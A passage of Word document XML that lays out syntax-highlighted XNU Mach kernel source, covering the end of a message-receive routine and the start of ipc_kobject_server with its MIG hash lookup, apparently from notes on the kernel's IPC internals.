          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>spac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rcv_nam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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mqueu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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>object</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m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r</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* hold ref for object */</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         * 1. MACH_RCV_OVERWRITE is on, and rcv_msg is our scatter list</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         *    and receive buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         * 2. MACH_RCV_OVERWRITE is off, and rcv_msg might be the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         *    alternate receive buffer (separate send and receive buffers).</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         */</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color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_RCV_OVERWRIT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rcv_msg_addr</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else</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rP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rcv_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mach_vm_address_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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rcv_msg_addr</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lastRenderedPageBreak/>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>else</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msg_addr</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sg_addr</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objec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object</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msiz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rcv_siz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option</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scatter_list_siz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scatter_list_siz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receiver_name</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ACH_PORT_NULL</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self</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ith_continuation</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thread_syscall_return</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_mqueue_receive</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mqueu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option</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rcv_size</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msg_timeout</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>THREAD_ABORTSAFE</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if</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>option</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_RCV_TIMEOUT</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b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msg_timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>thread_poll_yield</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>self</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ach_msg_receive_results</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </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color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_MSG_SUCCESS</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C06B3" w:rsidRPr="00C5329C" w:rsidRDefault="000C06B3" w:rsidP="000C06B3">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C06B3" w:rsidRDefault="000C06B3" w:rsidP="000C06B3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="147" w:name="_Toc445313349"/>
      <w:r w:rsidRPr="00B1522D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(kernel)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ipc_kobject_server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="147"/>
    </w:p>
    <w:p w:rsidR="000C06B3" w:rsidRPr="000C06B3" w:rsidRDefault="000C06B3" w:rsidP="000C06B3">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>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Routine:    ipc_kobject_server</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *  Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *      Handle a message sent to the kernel.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *      Generates a reply message.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *      Version for Untyped IPC.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *  Conditions:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *      Nothing locked.</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r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_kmsg_t</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_kobject_server</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kmsg_t</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>request</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mach_msg_size_t</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reply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kmsg_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kern_return_t</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kr</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port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destp</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mach_msg_format_0_traile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trailer</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gister</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mig_hash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ptr</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lastRenderedPageBreak/>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Find out corresponding mig_hash entry if any</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gister</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>key</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i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gister</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i</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HASH</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>key</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gister</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>max_ite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table_max_disp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do</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pt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amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mig_buckets</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i</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X_MIG_ENTRIES</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whil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key</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num</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </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num</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</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ax_iter</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routin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key</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num</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pt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ig_hash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008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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reply_siz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reply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reply_siz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if</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_COUNTER</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>        </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callcount</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endif</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 round up for trailer size */</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reply_siz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X_TRAILER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reply</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pc_kmsg_alloc</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reply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KM_NULL</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printf</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
